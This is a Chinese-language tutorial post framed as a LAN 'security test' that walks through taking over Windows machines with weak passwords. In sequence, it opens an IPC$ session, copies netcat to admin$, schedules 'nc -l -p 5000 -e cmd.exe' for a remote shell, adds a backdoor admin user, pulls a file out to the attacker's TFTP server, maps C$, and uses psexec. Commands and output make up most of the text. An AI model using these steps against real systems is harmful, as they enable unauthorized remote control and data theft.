局域网内部安全测试--------利用弱密码控制远程计算机

    技术2022-05-11  52

    先扫描内部网段(网上扫描软件很多,我习惯用X-Scan),获得弱密码

    可以看到现在已经扫描出来许多弱密码,可以进一步控制

    首先和对方建立连接net use //10.1.12.84/ipc$ "" /user:"Administrator" 命令成功完成。这是和ip为10.1.12.84的计算机建立IPC连接

    copy nc.exe //10.1.12.84/admin$/system32,    nc.exe是一个获得控制台木马的服务器端。复制一个文件到对方计算机的system32目录下面这里复制的是一个telnet类连接工具。nc是netcat的简写,通常称为黑客界的"瑞士军刀",功能比较强大。

    net time //10.1.12.84 查看对方计算机时间,以便利用计划任务   上午 08:40

    at //10.1.12.84 08:42 nc -l -p 5000 -e cmd.exe新加了一项作业,其作业 ID = 1添加一个任务,在08:42运行;运行之后将开放一个端口:5000可以通过这个端口获得一个shell ,即控制台

    运行之后就可以连接了nc 10.1.12.84 5000和对方计算机连接。本地的nc.exe 和对方的nc.exe 建立连接,获得一个shell.

    出现C:/WINDOWS/system32>现在就成功进入了对方计算机,管理员权限。

     

    现在测试一下能否在对方计算机上执行命令

    查看用户net user3个用户

    添加一个用户试试。net user testuser testpass /add命令成功完成

    查看用户net user4个用户

    将添加的用户加入管理员组。net localgroup administrators testuser /add命令成功完成

    看看刚添加的用户情况net user testuser管理员Administrators组

    删除用户net user testuser /del

    ipconfig 看它的IP :  10.1.12.84

    窃取资料dir c:/假设现在要c:/SOUND.LOG先在本地架设tftp服务器tftp -i 10.1.16.148 put c:/sound.log成功传回

     

    退出。

    再测试一下磁盘映射,现在我的电脑的硬盘分区为C D E Fnet use x: //10.1.16.148/c$查看我的电脑,多了一个x盘。现在操作对方文件如同操作自己计算机上的文件一样。x盘实际上就是对方的c盘删除映射net use x: /del

    利用管道工具psexec可以直接在建立IPC连接之后快速地取得控制权psexec.exe //10.1.12.84 cmd出现了shell,又进去了!C:/WINDOWS/system32>

    退出!

    删除连接net use //10.1.12.84/ipc$ /del

    演示结束,谢谢 !

     

    最新回复(0)